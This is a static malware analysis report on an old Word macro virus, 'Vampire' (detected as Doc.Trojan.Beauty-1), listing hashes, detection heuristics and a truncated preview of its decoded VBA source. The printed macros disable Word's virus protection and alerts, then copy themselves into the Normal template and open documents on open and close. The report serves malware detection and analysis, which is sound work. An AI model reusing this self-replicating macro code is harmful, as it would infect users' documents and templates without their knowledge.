Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 07dbf2b31ad59867…

MALICIOUS

Office (OLE)

39.0 KB Created: 1997-09-15 14:07:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f67942be65d681ffbcd0575a179fdd07 SHA-1: dba2e5a857484f1132bdc49fec7783c59110d505 SHA-256: 07dbf2b31ad598678f72adc8b7064fbd665533be46a379797e9b30edd3085dce
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and AutoClose routines. The 'Vampire' VBA macro attempts to copy itself to the Normal template, indicating a persistence mechanism. The ClamAV detection 'Doc.Trojan.Beauty-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7451 bytes
SHA-256: 57ff0c5b2f1b2347d95b33f7e3a727afd938be80ebd1f439d1cced2c97a76551
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Vampire"
Sub autoclose()
Attribute autoclose.VB_Description = "巨集建立於 97/09/15,建立者 AJB"
Attribute autoclose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Vampire"
' 巨集建立於 97/09/15,建立者 gdh
'
Dim AVA
On Error Resume Next
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocumentInstalled = False
    GlobalInstalled = False

    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Vampire" Then
            DocumentInstalled = True
        End If
    Next

    For j = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(j).Name = "Vampire" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
End If
Application.DisplayAlerts = wdAlertsAll

AVA = WordBasic.Int(Rnd() * 20) + 1
If AVA = 13 Then
WordBasic.Call "VM"
WordBasic.Call "VM2"
End If

exit_:


End Sub
Sub autoexec()
Dim TC
On Error Resume Next
WordBasic.Call "pire"

TC = WordBasic.Int(Rnd() * 30) + 1
If TC = 11 Or TC = 15 Or TC = 21 Or TC = 25 Or TC = 31 Then
WordBasic.Call "VM1"
WordBasic.Call "VM3"
WordBasic.Call "Vampire2"
End If

End Sub
Sub autoopen()
On Error Resume Next
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocumentInstalled = False
    GlobalInstalled = False

    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Vampire" Then
            DocumentInstalled = True
        End If
    Next

    For j = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(j).Name = "Vampire" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
End If
Application.DisplayAlerts = wdAlertsAll

exit_:
End Sub
Sub Vampire2()
Dim push1
Dim T1$
Dim T2$
Dim T2_
On Error Resume Next

VMP

WordBasic.BeginDialog 180, 78, "WM Vampire97"
    WordBasic.Text 9, 9, 160, 13, "   告訴您一個好消息", "Text1"
    WordBasic.Text 27, 28, 122, 13, "恭喜!您中獎了!!", "Text2"
    WordBasic.PushButton 43, 48, 88, 21, "確定", "push1"
WordBasic.EndDialog

Dim Vampire As Object: Set Vampire = WordBasic.CurValues.UserDialog
push1 = WordBasic.Dialog.UserDialog(Vampire, -1, 2500)
T1$ = WordBasic.[Left$](WordBasic.[CTime$](7), 2)
T2$ = WordBasic.[Right$](WordBasic.[CTime$](7), 2)
T2_ = WordBasic.Val
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.